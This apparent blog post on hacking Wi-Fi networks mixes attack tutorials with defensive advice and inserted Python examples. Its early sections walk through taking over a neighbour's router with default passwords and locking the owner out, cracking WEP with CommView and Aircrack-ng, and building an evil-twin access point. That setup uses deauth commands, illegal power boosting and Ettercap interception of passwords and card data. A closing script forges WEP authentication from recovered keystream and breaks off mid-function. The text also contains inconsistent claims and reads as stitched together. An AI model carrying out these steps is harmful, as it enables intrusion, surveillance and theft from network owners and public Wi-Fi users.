Hacking for Free Internet (Wi-Fi)
One of the most common targets of criminal hackers is internet connections (wi-fi). When you think about it, free internet access allows criminal hackers to not only get free bandwidth but to also conceal their location and identity.
What happens when your internet connection gets hacked? Your connection not only slows down, but your identity and location also get used for any illegal activity that a criminal hacker may do using your network.
At the same time, it also becomes very possible for a criminal hacker to get deeper access to your personal computer, thanks to discovered vulnerable ports and shared network devices such as printers. If your mobile phone is also synced to your computer, there is a risk that a criminal hacker would also get access to that device.
For this reason, it is very important to know how your internet connection can be hacked. In this blog, you will learn how most criminal hackers opt to crack your Internet connection through the most popular hack tools.
Check for Unchanged Router Passwords
This is probably the easiest way to hack an Internet connection. All you need to do is see which networks are available to you. To do that, switch on your computer’s Wi-Fi and look at the list of available networks in your vicinity.
Now, you would see that there are common router names in the list of available networks, such as Linksys.
There is a big chance that the default password for these routers is unchanged, so all you need to do is log in with the manufacturer’s default password.
How do you do that? You just need to go to the manufacturer’s website and look up the router’s manual.
If you are able to get into the target network using the default password, open a fresh browser and log in to the GUI of the target router. If your target is a Linksys router, the IP address that shows its GUI is 192.168.1.1.
Once you are prompted for login credentials, leave the username blank, and type in “admin” for a password. (Note: Some routers have different default login credentials depending on the model. You can check for these on the manufacturer’s website.)
Once you are in the GUI, you can change the SSID, the router password, and the security protocol of your target router. This way, you would be able to take full control of the router and prevent the network owner from connecting to his own ISP!
This method relies on the fact that far too many Internet users are not careful about securing their Internet connection before putting it to use.
You would be surprised that there are people who do not even bother changing the SSID of their Wi-Fi, which is almost a giveaway that it is not secured by a password other than what the manufacturer uses.
Hack Internet Password
What would hackers do when the Wi-Fi that they are trying to hack is secured? The next thing that they would do is to check how possible it is to guess what the password of their targeted network is.
At this point, you would need to learn a few key terms when it comes to identifying and assigning security to Wi-Fi connections:
1. WEP – means Wired Equivalent Privacy. This is the most basic form of Internet encryption, thus an unsafe option for most Internet users when it comes to assigning security to their wireless connection.
This type of encryption can be cracked with ease using the most basic hacking tools. Older models of Wi-Fi still use this type of encryption.
2. WPA – means Wi-Fi Protected Access. This is a more secure option for newer computer and router models, which can only be efficiently cracked through the old-fashioned trial-and-error method of guessing potential letter or word combinations (also known as dictionary attacks).
If a strong password combination is used, a WPA connection may almost be impossible to crack. Another variation of this security protocol is the WPA-2, which is tougher to penetrate.
At this point, you have the idea that most hackers would opt to hack available networks that are protected through WEP protocol since it is faster and much easier to crack. Here is a list of tools that a hacker needs in order to crack a WEP-protected Internet connection:
1. A wireless adapter – you would need to have a wireless adapter that is compatible with software called CommView. This software allows your wireless card to enter monitor mode.
To see if your wireless card is compatible with CommView, you can head over to Wired and Wireless Network Analysis Software by TamoSoft and see if your adapter is on the list.
2. CommView – CommView for WiFi is software that is used to capture packets from your target network. All you need to do is install this software and then follow the installation guide to install its drivers for your wireless card.
3. Aircrack-ng GUI – this software enables you to crack the password of your target network after you are done capturing packets.
Follow the steps below to start cracking a WEP-encrypted network:
1. Run CommView for WiFi to start scanning for wireless networks according to the channel. Leave it running for a few minutes. You would then see a long list of networks that your wireless adapter can reach.
2. Choose a WEP network (you would see this right next to the name of networks on the list.) Select a network that has the lowest decibel (dB) rating and has the highest signal.
3. Once you have chosen your target, right-click it to open a context menu. Click on Copy MAC Address.
4. Head over to the Rules tab on the menu bar and select MAC Addresses. Tick on the MAC Address rules.
5. For the Action option, choose CAPTURE. Afterward, head over to the Add Record option and choose BOTH.
6. Once you are done setting up the rules, paste the MAC address that you copied to your clipboard into the box that you would find below it.
7. When capturing packets, remember that you only need to capture the ones that will be used for cracking. To make sure that you only capture the packets that you need, select option D (which you would find on the bar right above the window) and deselect Management Packets and Control Packets.
8. Make sure that you save the packets that you have captured so that you can crack them for later. Go to the Logging tab on the menu bar and enable Auto Saving. Afterward, set the Average Log File Size to 20 and the Maximum Directory Size to 2000.
9. Now, wait until you capture enough data packets. Make sure that you wait until you have at least 100,000 data packets so you can get a decent signal for cracking.
10. After collecting enough data packets, head over to the Log tab and select all the logs that have been saved during capture. Head over to the folder where your saved logs are stored.
Click on File, and then Export, and select Wireshark tcpdump format to save it as a .cap file. Choose any destination that you would easily access later on. Do not close CommView.
11. Now, you are ready to crack. Run the Aircrack-ng GUI and choose the WEP option. You would be prompted to open the .cap file that you have exported a while ago. Once you retrieve that file, select Launch.
12. Once your Aircrack-ng GUI is running and decrypting the data packets that you had on your log, open the command prompt. Type in the index number of the network that you have selected a while ago.
13. Wait until the wireless key appears.
If everything goes well, you would easily get the wireless key of your targeted network. If you missed some packets, you would be prompted by Aircrack-ng that you need to capture more of them. If that happens, you just need to wait for CommView to get the additional packets that you need.
Can Tougher Security Measures be Breached?
At this point, you would realize that it is fairly easy for most hackers to gain access to the type of Internet security that you are using.
At the same time, you should also understand that once criminal hackers know what type of encryption you are using, it becomes easier for them to identify the tools they should use for hacking your network.
Is it possible for hackers to breach more advanced protocols such as WPA and WPA2?
Yes, they could accomplish such a feat, but it would take them more time – making the process inefficient, especially given that their goal for hacking network connections is to enjoy better bandwidth and have immediate internet access or even to mask their location.
For this reason, it would be best to enable WPA (or other better encryption options) should your devices allow it.
Now that you have a general idea on how hackers can steal your Wi-Fi, it is time to take some preventive measures. The next blog will tell you more about that.
Securing Your Network
It is possible for Internet connections to get stolen, but there are many ways to dissuade hackers from getting their hands on your bandwidth. If you think that someone is leeching on your Wi-Fi, it pays to check the users that are connected to your network.
Tell-Tale Signs of Breach
You can almost be certain that an unauthorized user is connected to your network if you experience the following:
1. You are experiencing intermittent Internet connection
If you are sure that you usually have a high-speed Internet connection and that you normally do not have problems when streaming or viewing pages, it is very possible that an extra user is logged in to your Wi-Fi.
2. You see changes in your Public folder
If you are the sole user of Internet in your household, or that you are very certain of what the contents of your network’s shared folders are, then there should be no reason for you to see any new or altered files on your Public folders.
The best way to check that is to pull down the context menu of any suspected files and see when they were last accessed or modified. If you do not remember accessing them on the displayed date and time, then somebody else is accessing them without your knowledge.
3. Your shared devices are behaving strangely
If your printer and other gadgets that can be accessed through the network are behaving strangely, or there are unknown devices that are suddenly included in your network, then somebody else must be using your network for remote access.
4. Your router’s lights keep on blinking even when you are offline
One of the low-tech ways to see whether there is an unauthorized Wi-Fi user on your network is to disable the connection on all your wireless devices. If your router’s wireless lights are blinking, then there is another user that is making use of your internet connection.
5. You have an unidentified user on your network’s console
You can see all the devices and their corresponding MAC addresses on your network’s admin console. All you need to do is to enter your router’s assigned IP address on your browser, enter your login credentials, and then check all the attached devices.
If there is an unrecognizable device on that list, then you are definitely certain that someone is snooping around on your wireless connection.
Beef Up Your Security and Auditing Measures
If you confirmed your suspicion that there is someone leeching on your Internet connection, the best way to prevent them from getting access is to change your router’s password and SSID immediately.
This way, the unauthorized user would be immediately kicked out of your network. To take things further, you may also opt to disable SSID broadcast so that your Internet connection would not be detected as an available network anymore.
However, this solution may be temporary if you are against a sophisticated hacker. Keep in mind that it is possible for some hackers to mask their MAC address through MAC spoofing, which means that their device may not appear on the list of attached devices when you check your router’s GUI.
When this happens, you may want to use more sophisticated tools for auditing connected devices on your network to check for any snooping activity. Here are some tools that you can use to make sure that you identify all unauthorized users on your network and prevent them from connecting to your router once and for all:
1. GlassWire
GlassWire serves as both a security system and a firewall. If you subscribe to the Pro version, you would gain access to the Network view that would enable you to see all the devices connected to your network.
You can also get a full report on how your bandwidth is being used, which includes a detailed graph of what running applications are using up bandwidth.
It would also alert you whenever there is an application that is trying to apply changes on your computer, or when an installer is trying to add a driver to your system.
What makes it a good security feature to your computer is that it would always alert you when there is a new device that connects to your wireless connection. If you are running a network of computers, this feature would be a most welcome addition to your security protocol.
2. Wireless Network Watcher by Nirsoft
This software is a clean program that works without any nag popup screen or adware, and for those who are trying to save up space, this tool does not even need to be installed.
All you need to do is to download the tool and launch it, and then it would start displaying all devices, MAC addresses, and Wi-Fi network hardware of all connected devices. This tool even allows you to identify devices that do not come with a specific device name, like Android devices.
This free wireless auditing tool is among the favorites of law enforcement organizations since it can tell you the location of any wireless hacker based on the information that they send across the network. It is fairly accurate in pinpointing locations up to two meters.
It does not run as an executable Windows file, so you would need to burn this file into a bootable CD. To use this program effectively, you would want to use a wireless card with a directional antenna, and then walk around with your laptop to triangulate and pinpoint the physical location of a wireless hacker.
Dealing with Fake Wi-Fis
If you are on the go and you need to send a quick email, it would be fairly tempting to log in to any available wireless network that seems to be unprotected by a password. Now, wouldn’t you think that it is just too convenient that an unprotected WLAN is available?
Hackers know exactly why people take the bait of free Wi-Fi: people do not think twice before connecting to an available hotspot in a public place.
Because hackers know that most people are not thinking about their devices’ safety when there is free internet access on the line, they are confident that people would fall for their trap.
Fake Wireless Access Point Theft
This hacking technique, also known as the evil twin access point, is mostly done in public areas, wherein a hacker would mask an access point as free internet connection and prompt people to connect to it. Once a victim connects to the fake wireless connection, they would be able to collect sensitive data from the connected device.
Usually, hackers who use this technique prompt the user to log in using any sensitive information (such as credit card information) in exchange for free access.
While the hacker stores this information for future use, he would redirect the targeted user to other sites that people commonly visit, such as a web browser, email landing page, or even social media sites.
From here on, the hacker would collect password information. Hackers then use the collected data to log in to other sites, assuming that their victims are using the same passwords for multiple sites.
Apart from knowing just the password of a targeted Internet user, an evil twin access point also allows you to see the traffic that comes in and out of a connected device. That means that creating an evil twin access point also allows you to view all the activities of a potential target.
The biggest telltale sign that you have been a victim of this type of hack is when you receive notices from your credit card company about charges that you did not make or that your social media account has been taken over.
However, if you think that you have connected to an evil twin access point, there is no telling what kind of information about your computer usage, or your files, have already been shared to thousands of hacker forums.
How an Evil Twin Access Point is Made
Creating a fake wireless access point would need almost the same tools that you use in hacking a Wi-Fi, which is the wireless card and the aircrack-ng suite.
This suite has a tool called airbase-ng, which can convert your wireless card into an access point. This tool would allow you to see all the traffic coming from a connected device and also enable you to make a man-in-the-middle attack.
The following hack would enable you to clone an existing access point (or your neighbor’s internet connection) and fool a target into connecting to a fake access point.
The objective of this hack is for you to know how a criminal hacker would be able to easily select a target within range, bump him off his own connection, and then force him into connecting to a false duplicate of his WLAN connection.
This would show you how any hacker would be able to monitor his target’s traffic, and also obtain sensitive information.
Here are the steps that you need to take in order to create an evil twin access point:
1. Start Airmon-Ng and check your wireless card. Run the following command: bt > iwconfig.
After doing so, you would be able to see that your wireless card is operational. It would most probably be assigned as wlan0 once it is up and running.
2. Once your wireless card is set, run it into monitor mode.
To do this, simply enter: bt > airmon-ng start wlan0
3. By running the previous command, you would be able to see all the wireless traffic that your wireless card can monitor with its antenna. That means that you would be able to see all the SSIDs of access points that the people around you are connecting to.
Now, you would need to capture this traffic. To do this, enter: bt > airodump-ng mon0
4. In order for you to dupe people into connecting to a fake wireless connection, you would need to clone an existing access point and convert it into an evil twin. Doing so would also allow you to insert your own packets or pieces of data into a target’s computer.
5. Now, all you need to do is to wait for your target computer to connect to his internet connection. When that happens, it would appear on the lower part of the screen.
6. Once your target has connected to his own access point, you would need to create a new access point using the same SSID and MAC Address of his WLAN.
The MAC Address would appear as the BSSID in the list of access points that your wireless card was able to detect during monitor mode. You would also need the channel where your target’s signal is.
Once you have the information that you need, pull up a new terminal and enter the following command:
bt > airbase-ng -a (BSSID) --essid “(name of the access point)” -c (channel) mon0
7. Now, you would need to take your target off his access point and force him to automatically reconnect to the fake access point that you have created in the previous step.
To do this, you would need to inject a deauth packet using the following command: bt > aireplay-ng --deauth 0 -a (BSSID of target) mon0
8. Here is one crucial aspect that hackers are aware of when they are creating an evil twin: the fake access point that you have should be close to the strength or stronger than the signal of the target’s true access point. If you are in a public place, this should not be a problem.
However, if you are targeting devices that are far from you, you would need to turn up your fake access point’s power.
To boost your access point’s signal to its maximum, key in the following command: iwconfig wlan0 txpower 27
Typing in this command would allow you to boost your access point’s output to the maximum allowable power in the United States, which is 500 milliwatts or 27dBm. If your target is too far, you may need to boost your access point’s power up to what your wireless card would allow you to.
Every country has Wi-Fi regulations, and the maximum allowable power for access points in another country may be illegal in yours.
Make sure that when you do the following hack, you are backed by your company and that you have obtained prior written consent from your practice target to avoid any legal repercussions of the next steps.
If you want to use another country’s maximum regulated power to boost your access point a little further (Bolivia has more available channels and can allow you to boost up to 1000 mW), you can use the following command to switch regulations: iw reg set BO
Once you are in this country’s regulatory domain, you can boost your wireless card to the maximum by typing the following command: iwconfig wlan0 txpower 30
To check for the output power, type: iwconfig
Now, you are guaranteed that all device users that are looking at available networks around you are seeing your access point in its full signal. If you boosted the signal to 30 dBm or 1000 mW, your fake access point would possibly be seen even from a few blocks away.
By boosting the signal, hackers are able to create the impression that their fake network is legitimate.
However, there is something you should keep in mind as you boost your wireless equipment’s power – overheating becomes a much greater risk as you move towards the higher output. So, it is recommended to at least consider lowering the device’s temperature, which is usually done by increasing airflow.
9. Now that you have successfully created a fake access point, the next step is to monitor the activity of your targets. You can use the software called Ettercap to start creating man-in-the-middle activities, which means that you can set up shop in this connection by intercepting, injecting traffic, or analyzing all the data that comes and goes into a target device.
Through this activity, you would be able to intercept all possible sensitive information that he may unknowingly pass through the evil twin network, such as passwords, credit card information, downloads, and uploads.
Now that you know how most hackers can set up shop in your devices by duping you into connecting to a fake access point, it’s time to take preventive measures. Here are some ways on how you can prevent attacks like this:
1. Ask for legitimate Wi-Fi service
The best defense against evil twin attacks is to verify what network you are connecting to before you connect. If you are in a public space, such as a café, make sure that you ask for the shop’s SSID and password. If you think that free Wi-Fi is too good to be true, it most probably is.
2. Always use different log-ins.
If there is no choice but to log in to a free public Wi-Fi, then make sure that you are using a different username and password to prevent giving everyone listening to the network a free pass to your most sensitive accounts.
3. Use a Virtual Private Network (VPN)
A VPN masks your device’s physical location by assigning you a different IP address and even a MAC Address.
It would also encrypt the data that you are sending out, which means that all the information that you are using to fill out any form on an evil twin network would not be deciphered by any hacker that would be listening on the other end.
VPNs are also great when it comes to detecting any evil twin network – if a free hotspot is prompting you to disconnect your VPN before you continue, then you know that the hackers on the other end are forcing you to disable any encryption that they can’t read through so that they can steal your data.
4. Be extra cautious when your devices suddenly disconnect from your secured internet, especially when all other devices that are connected to the network are also bumped off. It is very possible that a deauth packet has just been injected into your access point, forcing every device connected to it to disconnect.
When this happens, turn off the auto connect feature of your devices to prevent them from connecting to a potential evil twin access point.
5. If you are in an unfamiliar public area, turn off the auto connect to the hotspot feature of your devices.
6. Pay attention to any pop-ups and dialog boxes that tell you that there is another device that connected to your network.
7. Pay extra attention to the URL of the pages that you are connecting to. Most companies do advertise unencrypted versions of their websites, simply because HTTP is easier to remember than https.
Always remember that the added “s” means that you are visiting a secure site. Also, make sure that there is a lock icon on the browser when you are entering sensitive information.
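Two of the signs listed above can be checked by a wireless monitor on the owner’s side rather than by a user’s gut feeling: a burst of broadcast deauthentication frames carrying your access point’s address (sign 4), and a second access point beaconing your SSID from a BSSID or channel that is not yours (the verification behind sign 1). The script below is an added example, not part of the original post; the frame records are constructed to resemble the fields a monitor-mode capture tool exports (timestamp, frame subtype, source BSSID, destination, SSID, channel), and the known-network table is the owner’s own configuration.

```python
"""Defender-side heuristics for the evil twin pattern described above: a deauth flood
aimed at everyone on the access point, and a second AP advertising a known SSID.

Added example (not from the original post). FRAMES is a constructed capture; in
practice the records would come from a monitor-mode tool's export.
"""
from collections import defaultdict

BROADCAST = "FF:FF:FF:FF:FF:FF"

# Constructed baseline: the owner's networks, SSID -> set of (BSSID, channel) that are legitimate.
KNOWN_NETWORKS = {"HomeNet": {("AA:BB:CC:DD:EE:01", 6)}}

# Constructed frame records: (timestamp_seconds, subtype, source_bssid, destination, ssid, channel)
FRAMES = [
    (0.0, "beacon", "AA:BB:CC:DD:EE:01", BROADCAST, "HomeNet", 6),
    (1.0, "beacon", "AA:BB:CC:DD:EE:01", BROADCAST, "HomeNet", 6),
    # The same SSID and BSSID suddenly beaconing on another channel: a cloned AP.
    (2.0, "beacon", "AA:BB:CC:DD:EE:01", BROADCAST, "HomeNet", 11),
    # An unrelated cafe network nearby; not in KNOWN_NETWORKS, so never flagged.
    (5.0, "beacon", "11:22:33:44:55:66", BROADCAST, "CafeWiFi", 1),
]
# Twelve broadcast deauth frames within roughly half a second, carrying the owner's BSSID.
FRAMES += [(2.1 + 0.05 * i, "deauth", "AA:BB:CC:DD:EE:01", BROADCAST, None, 6) for i in range(12)]


def find_deauth_bursts(frames, window=1.0, threshold=5):
    """Report each BSSID that sent at least `threshold` broadcast deauth frames
    inside any `window`-second interval. A real AP sends deauths rarely and to
    individual clients; a flood to the broadcast address is the attack signature."""
    per_bssid = defaultdict(list)
    for ts, subtype, bssid, dst, _ssid, _ch in frames:
        if subtype == "deauth" and dst == BROADCAST:
            per_bssid[bssid].append(ts)

    alerts = []
    for bssid, times in per_bssid.items():
        times.sort()
        start, best, best_at = 0, 0, None
        for end, ts in enumerate(times):          # sliding window over sorted timestamps
            while ts - times[start] > window:
                start += 1
            count = end - start + 1
            if count > best:
                best, best_at = count, times[start]
        if best >= threshold:
            alerts.append({"bssid": bssid, "count": best, "window_start": best_at})
    return alerts


def find_ssid_clones(frames, known):
    """Report any (BSSID, channel) beaconing one of our SSIDs that is not in our baseline.
    Catches both a different BSSID using our name and our own BSSID copied onto another channel."""
    seen = defaultdict(set)
    for _ts, subtype, bssid, _dst, ssid, ch in frames:
        if subtype == "beacon" and ssid in known:
            seen[ssid].add((bssid, ch))

    alerts = []
    for ssid, pairs in seen.items():
        for bssid, ch in sorted(pairs - known[ssid]):
            alerts.append({"ssid": ssid, "bssid": bssid, "channel": ch})
    return alerts


if __name__ == "__main__":
    print("deauth bursts:", find_deauth_bursts(FRAMES))
    print("ssid clones:  ", find_ssid_clones(FRAMES, KNOWN_NETWORKS))
```

The two checks are deliberately independent: a deauth burst with no clone suggests a plain denial of service, a clone with no burst suggests an attacker waiting for devices to roam on their own, and the two together are the sequence the steps above describe. The thresholds are starting points to tune against a quiet capture of your own network, since a misbehaving client can also trigger a handful of legitimate deauths.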
Detecting and Targeting Wireless
In addition to standard wired networks, you will encounter a myriad of wireless networks and devices during your investigations. As such, you must have a strong knowledge of what they are, how they work, and how to potentially strike at them during your pentest.
Wireless technology extends a company’s network into areas that wired networks cannot go (or go easily). Reception for wireless networks can now easily extend into nontraditional areas such as coffee shops, hotels, libraries, public parks, lobbies, shopping malls, and restaurants, to name a few.
This greater range, as well as issues such as access, ease of setup, and unique security and setup requirements, has made wireless a prime target for attacks.
In this section, you’ll learn to:
Break wireless encryption technologies
Conduct a wardriving attack
Break the Internet of Things
An Introduction to Wireless
Wireless (Wi-Fi) collectively refers to the group of technologies covered by different frequencies and capabilities of wireless networks.
Nowadays nearly every gadget, device, and household appliance contain wireless technology. Wireless may be the only networking technology you find on your new gadget or device, with wired networking optional in many systems.
With all the convenience that the technology offers, the risks have increased, in some cases dramatically, compared to traditional wired networks.
Attacking parties have found wireless networks to be much easier to target and penetrate than wired networks, and many companies have slowed their implementation or needlessly exposed themselves to security risks.
Of course, there are drawbacks to every technology:
The range of wireless networks is not as good as that attained by traditional wired networks.
Interference is common on wireless networks due to the presence of other wireless devices and environmental factors. Interference means lower performance, dropped connections, reduced distance, and other issues. Performance and distance of wireless networks are never what is promised on the device itself and is usually around half of the numbers specified.
Security is a concern on wireless networks because the signal covers a much broader area than a traditional wired network can. Wireless-enabled devices are the norm and users of these devices tend to always look for open access points, in many cases not giving much care to whether or not they are secure.
Geographic and environmental conditions can have a tremendous impact on the range and speed of a network. Changes in air density, trees, walls, temperature, and other conditions will affect wireless networks.
There are many advantages that make wireless a great target of opportunity:
Can go places where wires would be impossible to place and thus easier to access
Available in many places where wired networks do not exist or can’t exist
Extremely common technology
A wireless network relies on radio frequency (RF) to send and receive information, so understanding RF will assist you in working with these networks. Much like Ethernet networks, Wi-Fi networks are concerned with what happens at the physical layer of networking.
The physical layer defines how stations will connect, transmit, receive, and format signals for use on a network, which, in this case, is wireless.
Recognizing the Components of a Wireless Network
Wireless technology has a special language and set of terminology. Though you may not hear all the terms all the time, familiarity with them is important, so I will introduce you to each and their respective function or place.
Service Set Identifier (SSID) This is the name that is broadcast by a wireless access point that identifies itself to potential clients.
You have already seen an SSID appear in your favorite wireless client as the text string that appears in the list of available wireless networks. The name can be made up of a combination of letters and numbers.
An SSID is used to identify a wireless network to clients. However, wireless networks can have their SSID either visible or hidden depending on the situation. On open networks, the SSID is visible and can be viewed by any client searching for it. On closed networks, the SSID is not visible and in some cases is said to be cloaked.
Association When a wireless access point and a wireless client connect while getting ready to exchange information, it is called an association.
Hotspot This is any location that provides wireless access to an area such as a coffee shop, airport, library, lobby, or similar location.
Access Point This is a hardware device or software application that allows a wireless network to be established. Clients connect to the access point for network services.
When working with the standard access points sold in consumer electronic stores, changing the antenna is not an option. However, where a large and more powerful enterprise access point is involved, the selection of an antenna is much more important.
Let’s take a look at the different types of antennas that you may encounter and what each may mean to you as a security person.
Wi-Fi Authentication Modes
Clients associating with an access point must not only be in range and speaking the language, but they must also perform some sort of authentication. There are two major types:
Open System Authentication (OSA) is used in situations where the access point can be attached to by any client. This type of authentication occurs when an authentication frame is sent from a client to an access point (AP).
When the AP receives the frame it verifies its SSID, and if correct the AP sends a verification frame back to the client, completing the connection sequence.
It is important to remember that just because this process has completed successfully it does not in any way mean that the client will be able to access the network resources. All that has happened is that the client can attach to the access point.
Shared Key Shared key authentication is different from OSA. A client receives a key ahead of time, which allows them to attach to the network.
In a few steps, this is how shared key authentication works:
1. The client sends an authentication request to the access point.
2. The access point returns a challenge to the client.
3. The client encrypts the challenge using the shared key it is configured with.
4. The access point uses the same shared key to decrypt the challenge; if the responses match, then the client is validated and is given access to the network.
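The four steps above can be followed in code with a toy access point and client. This is an added example, not from the original text: the cipher is RC4 (the stream cipher WEP builds on, implemented inline here because it is only a few lines), the shared key and challenge are simplified stand-ins, and nothing below is the 802.11 frame format. What it shows is the control flow: the AP remembers which challenge it issued to which station, accepts only a response that decrypts back to that exact challenge, and a client holding the wrong key is rejected without the AP ever revealing the key.

```python
"""Simulation of shared key authentication (request, challenge, encrypted response, verify).

Added example, not from the original text. RC4 is implemented inline; the key,
challenge and "frames" are simplified stand-ins, not the 802.11 wire format.
"""
import os


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 stream cipher: XOR `data` with the keystream derived from `key`.
    Encryption and decryption are the same operation."""
    # Key-scheduling algorithm: permute S under the key.
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation: one keystream byte per data byte.
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


class AccessPoint:
    def __init__(self, shared_key: bytes):
        self._key = shared_key
        self._pending = {}          # station id -> challenge we issued and are waiting on

    def handle_auth_request(self, station_id: str) -> bytes:
        # Step 2: answer the request with a fresh random challenge.
        challenge = os.urandom(16)
        self._pending[station_id] = challenge
        return challenge

    def handle_challenge_response(self, station_id: str, response: bytes) -> bool:
        # Step 4: decrypt with the same shared key; accept only an exact match.
        challenge = self._pending.pop(station_id, None)
        if challenge is None:       # no outstanding challenge for this station
            return False
        return rc4(self._key, response) == challenge


class Client:
    def __init__(self, shared_key: bytes):
        self._key = shared_key

    def answer(self, challenge: bytes) -> bytes:
        # Step 3: encrypt the challenge with the key configured ahead of time.
        return rc4(self._key, challenge)


def shared_key_auth(ap: AccessPoint, client: Client, station_id: str = "sta-1") -> bool:
    """Run the full exchange; True means the AP validated the client."""
    challenge = ap.handle_auth_request(station_id)        # step 1 + 2
    response = client.answer(challenge)                   # step 3
    return ap.handle_challenge_response(station_id, response)  # step 4


if __name__ == "__main__":
    key = b"constructed-shared-key"
    print("right key:", shared_key_auth(AccessPoint(key), Client(key)))
    print("wrong key:", shared_key_auth(AccessPoint(key), Client(b"some-other-key")))
```

Because the AP pops the pending challenge once it has been answered, a second response for the same station is rejected until a new request is made, which is the minimum a challenge-response design needs to avoid accepting a stale answer twice.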
Breaking Wireless Encryption Technologies
One of the things that have made wireless networks less than attractive to companies traditionally is their perceived lack of or weak security. Since wireless networks transmit their signals over the air, the information is more vulnerable than it would be on a wired network.
Without adequate protection, the information can be easily sniffed and even captured by a third party. To reduce this problem, encryption is commonly implemented to make the likelihood of interception lower.
The three most common technologies used to protect wireless networks are as follows:
Wired Equivalent Privacy (WEP) The oldest and weakest of the three, WEP was the initial attempt to provide wireless security and was found to be badly flawed not long after it debuted.
Wi-Fi Protected Access (WPA) The interim successor to WEP, WPA was intended to fix WEP's problems on existing hardware. It is a much stronger system but still has vulnerabilities. WPA uses TKIP, which wraps the same RC4 cipher in per-packet keys and a keyed message integrity check; AES-CCMP was optional in WPA and became mandatory only in WPA2.
WPA2 The successor to WPA, based on the full IEEE 802.11i standard. WPA2 mandates AES in CCMP mode and keeps TKIP only for backward compatibility with older clients; TKIP is not a stronger option. Both WPA and WPA2 come in a Personal flavour (a pre-shared key) and an Enterprise flavour that authenticates each user through 802.1X/EAP.
With all the alphabet soup revolving around security protocols, which is the best to use? Which is the most vulnerable? Which is the strongest? Let’s take a look to see what is what with security and wireless.
When wireless networks were first introduced to the public, the need for security was readily obvious and the creators of wireless introduced WEP to provide this ability. WEP is the oldest of the security protocols available for wireless networks and also happens to be the most vulnerable.
When originally introduced with the 802.11b standard, WEP was intended to make wireless networks as secure as wired networks. However, this proved not to be the case as the technology was not up to par.
On the surface, WEP looks like a reasonable design: it uses a well-known stream cipher, RC4, and a CRC for integrity. In actuality, the implementation was extremely poor.
WEP was created with good intentions by people not familiar with cryptography, who did not enlist the aid of those who were.
So good building blocks were used badly: a 24-bit initialization vector that repeats within hours on a busy network, the IV prepended directly to the static key (which exposes RC4's weak key-scheduling behaviour), and a linear CRC-32 "integrity" check that lets an attacker flip bits in the ciphertext and fix up the checksum without knowing the key.
WEP was intended to provide the following:
Defeat eavesdropping on communications and reduce unauthorized disclosure of data
Check the integrity of data as it flows across the network
Use a shared secret key to encrypt packets prior to transmission
Provide confidentiality, access control, and integrity in a lightweight, efficient system
Its problems arise from the following circumstances:
The protocol was designed without input from the academic community.
It provides no mechanism for key distribution and instead relies on a single preshared key typed into every device. Because rekeying means touching every client, many users never change the key at all.
An attacker who gathers enough encrypted packets can recover the key from the traffic: the IV of each packet travels in the clear, the plaintext of much of the traffic (ARP, for example) is predictable, and RC4's key scheduling leaks key bytes for certain IVs.
Undoubtedly, you have heard a lot about how poor the WEP protocol is and how it should not be used. What we are going to explore is how WEP is broken so you can see the process and how everything pulls together.
To perform this process from end to end, including the process of cracking the keys, follow these steps:
1. Put the wireless interface on the attacking system into monitor mode on the target access point's channel. Monitor mode observes every frame in the air without connecting to an access point.
2. Test whether your adapter and driver can inject packets into the target network (aireplay-ng -9 performs this test).
3. Use aireplay-ng to perform a fake authentication with the access point so that it accepts frames from your MAC address.
4. Start airodump-ng to capture Initialization Vectors (IVs). To speed things up, use aireplay-ng to capture an ARP request and reinject it back into the network; every retransmission is encrypted under a fresh IV, so the capture grows quickly.
5. Run aircrack-ng (or a comparable tool such as Cain & Abel on Windows) against the capture to recover the key from the collected IVs.
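The shared-key exchange described earlier and the WEP weaknesses just listed come down to the same three facts: a static key, a 24-bit IV sent in the clear, and a stream cipher. The following Python is an added example written for this edit, not code from the original post or from the aircrack-ng project. It implements RC4 and the WEP frame body from the published algorithms (the key-index byte that follows the IV on the air is left out), with a constructed key, IV, challenges and ARP frame. It shows a passive listener recovering the keystream from one shared-key authentication, then authenticating without the key and reading another frame sent under the same IV. This is the same trick aireplay-ng's fake authentication relies on against shared-key networks, where it is fed a keystream file taken from a real authentication.

```python
# Added example for this edit (not code from the original post or the aircrack-ng project).
# RC4 and the WEP frame body follow the published algorithms; the key-index byte that
# follows the IV on the air is omitted. Key, IV, challenges and the ARP frame are constructed.
import os
import struct
import zlib


def rc4(key, length):
    """RC4 keystream: key scheduling (KSA), then the output generator (PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data):
    """WEP integrity check value: an unkeyed CRC-32, encrypted together with the data."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key, iv, plaintext):
    """WEP frame body: 3-byte IV in the clear, then RC4(IV || key) over plaintext || ICV."""
    payload = plaintext + icv(plaintext)
    return iv + xor(payload, rc4(iv + key, len(payload)))


def wep_decrypt(key, body):
    """Returns the plaintext, or None if the ICV does not check out."""
    iv, ct = body[:3], body[3:]
    pt = xor(ct, rc4(iv + key, len(ct)))
    return pt[:-4] if pt[-4:] == icv(pt[:-4]) else None


# Shared-key authentication as the honest client and AP perform it (steps 2 to 4 above).
def ap_challenge():
    return os.urandom(128)                       # 128-byte challenge, sent unencrypted


def client_response(key, iv, challenge):
    return wep_encrypt(key, iv, challenge)


def ap_verify(key, response, challenge):
    return wep_decrypt(key, response) == challenge


# What a passive listener can do with one overheard authentication.
def recover_keystream(challenge, response):
    """Known plaintext (challenge || ICV) XOR ciphertext = the RC4 keystream for that IV."""
    iv, ct = response[:3], response[3:]
    return iv, xor(challenge + icv(challenge), ct)


def forge_response(iv, keystream, new_challenge):
    """Answer a fresh challenge without the key by reusing the keystream under the same IV."""
    payload = new_challenge + icv(new_challenge)
    return iv + xor(payload, keystream)


def decrypt_with_keystream(iv, keystream, body):
    """Any later frame sent under the same IV is readable with the recovered keystream."""
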